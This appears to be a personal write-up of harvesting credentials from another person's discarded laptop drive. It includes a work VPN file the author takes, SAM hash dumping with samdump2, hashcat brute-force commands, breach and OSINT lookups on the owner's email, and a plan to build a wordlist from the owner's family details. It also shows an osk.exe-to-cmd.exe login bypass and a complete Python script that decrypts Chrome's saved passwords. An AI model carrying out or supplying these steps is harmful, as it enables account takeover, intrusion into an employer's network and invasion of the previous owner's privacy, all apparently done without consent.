[0m
   ░  █████████████████████████████████████████████████████████████░░█
   ░██░░░█░░░░░░░░░░░░░░░░░░░████████████████████████████████░░░█░░███
   ░░░█░░░░░░░░░░░░░░███░░   [33m..................[0m  ░███░█░░░██████░░░░░█
   ░░░░░░░░░░░░░███░.  [33m.............................[0m ░█████░░███░░░░░█
   █░░░░░░░░░███. [33m......................................[0m ██████░░█░░░█
   █░░░░░░░███ [33m............................................[0m █░░░█░░░░█
   ░░░░░░░█.[33m.................................................[0m ░██░░░░█
   ░░░░░█/[33m.....................................................[0m ██░░░█
   █░░░█ [33m........................................................[0m██░░█
   █░░█ [33m........................[0m */.  (/ .[33m......................[0m  █░░█
   █░█ [33m......................[0m*/ ../,#.,.. */.[33m..................... [0m███
   █░█ [33m..................[0m.,./..//**.  **/ %.,,.[33m....................[0m,██
   █░. [33m....................[0m* (.**  ,,,  ,*..**.,[33m................... [0m██
   ██ [33m....................[0m,,*..*/#     #/&*#...,[33m...................[0m ██
   █░,[33m................... [0m#.,.%./((* ,/(.*....( [33m....................[0m██
   █░█ [33m................... [0m/@.,.,, *#.**,,,.,#[33m ...................[0m ░░█
   █░░.[33m.....................[0m *&(  ...... (%( [33m.....................[0m ░░█
   █░░█ [33m........................  [0m*/,*/  [33m........[30m█[0m [30m░[33m............[0m  █░░█
   █░█░█.[33m.....................................[30m░░░░░[33m..............[0m░░█.█
   ███░░██[33m ................................ [30m█░░░░[33m............[0m. ░░░░░░█.
   █░░██░░░( [33m............................[0m,,[30m█[0m [30m██[0m [33m............[0m (░█░██░░░.
   ░██████░░░█[33m ......................  [30m█[0m [30m░[0m [30m█░[0m [33m............[0m (█░█░░░░░█░.
   ░█████████░██░[33m  ................[0m   [30m░░░[0m [30m░[0m [33m...........[0m ░███░░░░░#░#█░,
  ░░█[33m.,,.,.,.[37m(██████(  [33m.........[0m         ..[33m..[0m..[33m...[0m  (███░░░░█░░░░░░░█░,
  ░░█ ./ [33m,,,.,[37m /██████████*  ░    [30m░[0m    [30m░░[0m [30m░[0m   ███░███░░░░░░░░█░██░███░█
  ░░█(██[33m.,.,...,.,.. [37m%████░░░░░░     [30m░[0m ███████████░█░░░░░░░░░░██░░░░█░█
  ░░██%[33m., ,,..,.,,,,,[37m(   ./.█░░░(░█░███░░█░░░░░░██░█░░░░░░░░░░░░░░░░█░░
  ░░███████.[33m.......,,*[37m, . **& ░█, ░░█████████░█░░█░██░░░░░░░░░░░░░░░█░░
  █░█░░████[33m........,..[37m((█/     ,█/█░░██░░░░░░░█░░░█░░░░░░░░░░░░░░░░░█░░
  █░█░░░█ ░█[33m.,.,.,,,,,,[37m %((█.   █..(█░█░░░░░█░░░░░█░█████░███░███░░░█░█
  █░█░░░██ ░░ [33m,.,,,..,,.,......,[37m ███(██░░░░░█░░███████████████████░░█░░
  █░█░░░█░░░█░█ [33m,..,,.......,,.[37m(#[33m.,,,[37m.░█░█░░██   █░██░░░█░░░░██(  ███░█
  █░░░░░░░░░░██░█░/[33m..,......,,,...[37m(*,.░█░█░░█░█.██░░░░░░░░░░░░░██░███░█
  █░░░░░░░░░░████/(██. ██.[33m,.,.,,...,.[37m.░█░█░░█░█░ ██░░░░░░░░░░░█ ,██░░░█
  █░░░░░░░░░░░░░░░░████░░███████████████░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
  █░░░░░█░░░░░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░███░░█
  █░░░██░░█░░░░░░░░░░░░░░░░░░░░░░█     █░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
  (█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██
   [30m█░░███[0m                            [30m░░░░░░░░░█░█░█░██[0m

I got an old laptop, it's fate was to be thrown away.
The HDD is still there, let's find passwords

1. most likely ntfs, so I'll install ntfs-3g
2. find drive using sudo fdisk -l

Disk /dev/sdc: 149,5 GiB, 160041885696 bytes, 312581808 sectors
Disk model: WDC WD1600BJKT-7
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00068e07

Device     Boot     Start       End   Sectors   Size Id Type
/dev/sdc1  *         2048    206847    204800   100M  7 HPFS/NTFS/exFAT
/dev/sdc2          206848 311654399 311447552 148,5G  7 HPFS/NTFS/exFAT
/dev/sdc3       311654400 312575999    921600   450M 27 Hidden NTFS WinRE

3. mount

$ sudo mkdir -p /mount/rescued_hdd && sudo mount /dev/sdc2 /mount/rescued_hdd
Windows is hibernated, refused to mount.
The disk contains an unclean file system (0, 0).
Metadata kept in Windows cache, refused to mount.
Falling back to read-only mount because the NTFS partition is in an
unsafe state. Please resume and shutdown Windows fully (no hibernation
or fast restarting.)
Could not mount read-write, trying read-only

Read-only mount works, cool.

First stop was dumpster diving in `$Recycle.Bin` - nothing was there
Next stop was in Users/dell/Downloads (dell is the username)
\o/ Got an ovpn file to connect to the work network

Next is Users/dell/Cookies, nothing interesting there, just a couple of tokens or ids.

I went to Application Data, couple of log files, but I really wanted to go to AppData instead,
just mixed up the names

So in AppData, I've found "Google" under Local which suggests that Chrome was used
I browsed into Google/Chrome/User Data/Default/Cache and did an ls -la which took several seconds to complete

There's a bunch of files here, but they aren't plain text. Abandoning for now, and will come back later if I'm not satisfied

Next up is one level up & Login Data - which lists some websites and usernames, but seems to be encrypted to some level.
Let's park it for now, I think the user's password will be helpful when decrypting these

Let's go to /mount/rescued_hdd/Windows/System32/config. There's a SAM file here, let's see if I can get some
passwords out of it. I copy SAM and SYSTEM to my linux home folder

[device@home]-[15:29:59]-[~/hax]
$ ls -la
total 14728
drwxrwxr-x  2 device device     4096 szept 18 15:29 .
drwxr-xr-x 30 device device     4096 szept 18 15:29 ..
-rwxrwxr-x  1 device device   131072 szept 18 15:29 SAM
-rwxrwxr-x  1 device device 14942208 szept 18 15:29 SYSTEM

[device@home]-[15:30:09]-[~/hax]
$ samdump2 SYSTEM SAM
*disabled* Rendszergazda:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Vendég:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dell:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9ced556ce8ee0e7fa31ddff8c4bd68ee:::

\o/ Got the NTLM hash for the user

Let's transform it to uppercase

[device@home]-[15:34:35]-[~/hax]
echo "9ced556ce8ee0e7fa31ddff8c4bd68ee" > hash2crack

Before I could start hashcat, I need to install some GPU drivers BRB

Ok, that was a pain in the ass, let's proceed now.

[device@home]-[15:40:25]-[~/hax]
$ hashcat -m 1000 -a 3 ./hash2crack ?a?a?a?a?a?a?a?a?a -w 3 --increment --increment-min 6 --increment-max 10

-m 1000 -> NTLM
-a 3 -> brute-force attack mode
-w 3 -> High workload profile
?a?a?a?a?a -> mask, ?a contains lower & uppercase chars, numbers and special chars
--increment -> if no match found, repeat the mask for another char
--increment-min & increment-max -> min pw chars and max pw chars

After running it for several hours, the password seems to be a strong one, let's abandon brute-forcing.

Next I think maybe a dictionary could help. Let's go back to /mount/rescued_hdd/Users/dell/AppData/Local/Google/Chrome/User Data/Default
There are a couple of files as we saw already, like "Login Data" which is an sqlite DB.

Opening it I can see some usernames and sites associated with the account. I'll use this information to try and get pet names,
children names, place and date of birth and other significant events to construct a dictionary.

Before that, I've tried the great https://github.com/khast3x/h8mail but it yielded no matches for this e-mail address :(

[37m 		  Official h8mail posts:
		  https://khast3x.club/tags/h8mail/

 [0m
	 [95m Version 2.5.4 - "ROCKSMASSON.4"  [0m
[01m[38;5;33m [0m
[01m[38;5;69m 	._____. ._____.     ;____________;[0m
[01m[38;5;69m 	| ._. | | ._. |     ;   h8mail   ;[0m
[01m[38;5;105m 	| !_| |_|_|_! |     ;------------;[0m
[01m[38;5;105m 	!___| |_______!  Heartfelt Email OSINT[0m
[01m[38;5;141m 	.___|_|_| |___.    Use responsibly[0m
[01m[38;5;141m 	| ._____| |_. | ;____________________;[0m
[01m[38;5;177m 	| !_! | | !_! | ; github.com/khast3x ;[0m
[01m[38;5;177m 	!_____! !_____! ;--------------------;[0m
[01m[38;5;213m 	[0m
[01m[32m[>] [0mh8mail is up to date
[01m[94m[~] [0m[37mRemoving duplicates[0m
[01m[32m[>] [0mTargets:
[01m[32m[>] [0m███████████@gmail.com
[01m[32m[>] [0mscylla.sh is up
[01m[94m[~] [0m[37mTarget factory started for ███████████@gmail.com[0m
[01m[94m[~] [0m[37m[███████████@gmail.com]>[hunter.io public][0m
[01m[32m[>] [0mFound 0 related emails for ███████████@gmail.com using hunter.io (public)
[01m[94m[~] [0m[37m[███████████@gmail.com]>[scylla.sh][0m
[01m[32m[>] [0mFound 0 entries for ███████████@gmail.com using scylla.sh

[01m __________________________________________________________________________________________
 [0m
[01m[32m[>] [0mShowing results for ███████████@gmail.com[0m

[01m[94m[~] [0m[37mNo results founds[0m
__________________________________________________________________________________________



                                 [01m [04m Session Recap: [0m


                 Target                  |                   Status                  [0m
__________________________________________________________________________________________

        ███████████@gmail.com          |  [37m             Not Compromised              [0m
__________________________________________________________________________________________

Execution time (seconds):  [96m 1.754192590713501 [0m



I also spent a good $5 on dehashed as there was a match in the relatively recent MyFitnessPal leak (which is found in the login data),
but unfortunately I didn't get the password there either.

After learning some more about Chrome's encryption (link tweet), I decided it's better than
my skills at breaking them, so let's abandon this.

I do sudo mount -t ntfs-3g -o remove_hiberfile /dev/sdc2 /mount/rescued_hdd/ to be able to mount the volume as read-write, and will
overwrite the accessibility popup with cmd, so I can trigger an elevated prompt on the
windows login screen and reset the user's password.

cd /mount/rescued_hdd/Windows/System32
mv osk.exe osk.exe.bak
cp cmd.exe osk.exe

Let's reboot....

Booting up the HDD I get ready to enter the net user commands for resetting the user's password, but to my amazement
it just straight up logs me in. Not much of a challenge here I guess.

I'm installing Python, pypiwin32 and pycryptodomex, then run


import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil


def get_master_key():
    with open(os.environ['USERPROFILE'] + r'\AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass
    except Exception as e:
        # print("Probably saved password from Chrome version older than v80\n")
        # print(str(e))
        return "Chrome < 80"



if __name__ == '__main__':
    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("Loginvault.db")
    except Exception as e:
        pass

from https://stackoverflow.com/a/61333362

Most passwords were saved with an older version of Chrome that uses a different encryption,
but the ones I did recover confirmed that I could've totally cracked the passwords - if there was any -
using the dictionary attack composed of important years and names.
